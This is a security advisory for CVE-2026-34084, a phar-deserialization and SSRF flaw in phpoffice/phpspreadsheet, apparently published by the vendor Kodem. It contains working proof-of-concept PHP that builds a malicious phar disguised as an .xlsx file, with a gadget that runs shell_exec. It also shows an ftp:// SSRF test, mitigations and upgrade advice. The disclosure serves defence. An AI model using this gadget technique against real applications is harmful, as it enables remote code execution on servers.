CVE-2026-34084

CVE-2026-34084 is a critical-severity insecure deserialization vulnerability in phpoffice/phpspreadsheet (composer), affecting versions >= 4.0.0, <= 5.5.0. It is fixed in 5.6.0, 3.10.4, 2.4.4, 2.1.15, 1.30.3.

Summary

The usage of is_file, used to verify if the $filename is indeed an actual file, by all(?) Reader implementations (inside the helper function File::assertFile) is php-wrapper aware, for any php wrappers implementing stat().
The 3 wrappers ftp://, phar:// and ssh2.sftp://, all satisfy this requirement - 2 of which are shown in the PoC below.

This results in a SSRF, at "best", and RCE at worse.

This was tested against the latest release - but the issue seems to go back a while from a first quick check (still present in v1.30.2).

PoC

To reproduce the vulnerable behavior, the following scripts were used:

php.ini file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library:

phar.readonly=0

make_phar.php to create the malicious file:

<?php
// php -c php.ini make_phar.php
class GadgetClass {
    public $data;
    function __construct($d) {
        $this->data = $d;
    }
    function __destruct() {
        shell_exec($this->data);
    }
}

$pop = new GadgetClass('touch /tmp/poc.txt');

$phar = new Phar('exploit.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->addFromString('whatever', 'dummy content');
$phar->setMetadata($pop);
$phar->stopBuffering();

rename('exploit.phar', 'exploit.xlsx'); // optional
echo "exploit.xlsx created \n";

test.php showcases the unsafe pattern:

<?php
require 'vendor/autoload.php';

use PhpOffice\PhpSpreadsheet\IOFactory;

class GadgetClass {
    public $data;
    function __construct($d) {
        $this->data = $d;
    }
    function __destruct() {
        shell_exec($this->data);
    }
}

$filename = $argv[1] ?? null;

if (!$filename) {
    echo "Usage: php test.php <path>\n";
    echo "  e.g. php test.php phar://exploit.xlsx/whatever\n";
    exit(1);
}

echo "Calling IOFactory::load('" . $filename . "')\n";

try {
    $spreadsheet = IOFactory::load($filename);
    var_dump($spreadsheet);
} catch (Throwable $e) {
    echo "Vuln has still triggered even if exception triggers.\n";
}

RCE

Run the PoC (for RCE):

php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt

The file /tmp/poc.txt should now be present on disk.

Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead.

SSRF

Run the PoC (for SSRF):

ncat -lvp 21 #run on another terminal
php test.php ftp://127.0.0.1:21/test

Observe a connection is made to 127.0.0.1 on port 21.

Root Cause Analysis

Following the API exposed by the library, using IOFactory::load, the code proceeds as follows:

IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) ->  File::assertFile($filename, ...) -> is_file($filename);

The one obvious gadget that was found is guarded via __unserialize (or __wakeup in older versions) in the XMLWriter class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios.

    public function __destruct()
    {
        // Unlink temporary files
        // There is nothing reasonable to do if unlink fails.
        if ($this->tempFileName != '') {
            @unlink($this->tempFileName);
        }
    }

    /** @param mixed[] $data */
    public function __unserialize(array $data): void
    {
        $this->tempFileName = '';

        throw new SpreadsheetException('Unserialize not permitted');
    }

Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from packagist like maatwebsite/excel for Laravel, sonata-project/exporter and so on, hence the deserialization vector stays relevant in other contexts.

Suggested mitigations

Use is_file only after making sure the filename does not contain any php wrapper:

$scheme = parse_url($filename, PHP_URL_SCHEME);
// strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :)
// since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge
if ($scheme !== null && strlen($scheme) > 1) {
    throw new \PhpOffice\PhpSpreadsheet\Exception(
        "Stream wrappers are not permitted as file paths: {$filename}"
    );
}

or perhaps even just passing it to realpath before calling is_file to ensure it is parsed correctly:

$real = realpath($filename); // not php wrapper aware AFAIK
if ($real === false) {
    throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}");
}

// from here on, $real should be a clean absolute path so we can pass it to is_file()
if (!is_file($real)) {
    throw new ...
}

Note: stream_is_local() would also not be safe here, as it considers phar:// to be local and would not block it.

Impact

Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect. Typical impact: arbitrary code execution or logic abuse.

Affected versions

phpoffice/phpspreadsheet (>= 4.0.0, <= 5.5.0) phpoffice/phpspreadsheet (>= 3.3.0, <= 3.10.3) phpoffice/phpspreadsheet (>= 2.2.0, <= 2.4.3) phpoffice/phpspreadsheet (>= 2.0.0, <= 2.1.14) phpoffice/phpspreadsheet (<= 1.30.2)

Security releases

phpoffice/phpspreadsheet → 5.6.0 (composer) phpoffice/phpspreadsheet → 3.10.4 (composer) phpoffice/phpspreadsheet → 2.4.4 (composer) phpoffice/phpspreadsheet → 2.1.15 (composer) phpoffice/phpspreadsheet → 1.30.3 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade the following packages to resolve this vulnerability:

phpoffice/phpspreadsheet to 5.6.0 or later; phpoffice/phpspreadsheet to 3.10.4 or later; phpoffice/phpspreadsheet to 2.4.4 or later; phpoffice/phpspreadsheet to 2.1.15 or later; phpoffice/phpspreadsheet to 1.30.3 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-34084? CVE-2026-34084 is a critical-severity insecure deserialization vulnerability in phpoffice/phpspreadsheet (composer), affecting versions >= 4.0.0, <= 5.5.0. It is fixed in 5.6.0, 3.10.4, 2.4.4, 2.1.15, 1.30.3. Untrusted serialized data is processed by a deserializer that can instantiate arbitrary objects or execute code as a side effect.
  2. Which versions of phpoffice/phpspreadsheet are affected by CVE-2026-34084? phpoffice/phpspreadsheet (composer) versions >= 4.0.0, <= 5.5.0 is affected.
  3. Is there a fix for CVE-2026-34084? Yes. CVE-2026-34084 is fixed in 5.6.0, 3.10.4, 2.4.4, 2.1.15, 1.30.3. Upgrade to this version or later.
  4. Is CVE-2026-34084 exploitable, and should I be worried? Whether CVE-2026-34084 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-34084 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-34084?
    • Upgrade phpoffice/phpspreadsheet to 5.6.0 or later
    • Upgrade phpoffice/phpspreadsheet to 3.10.4 or later
    • Upgrade phpoffice/phpspreadsheet to 2.4.4 or later
    • Upgrade phpoffice/phpspreadsheet to 2.1.15 or later
    • Upgrade phpoffice/phpspreadsheet to 1.30.3 or later

Other vulnerabilities in phpoffice/phpspreadsheet

CVE-2026-40902CVE-2026-40863CVE-2026-34084CVE-2026-40296CVE-2026-35453

Stop the waste.
Protect your environment with Kodem.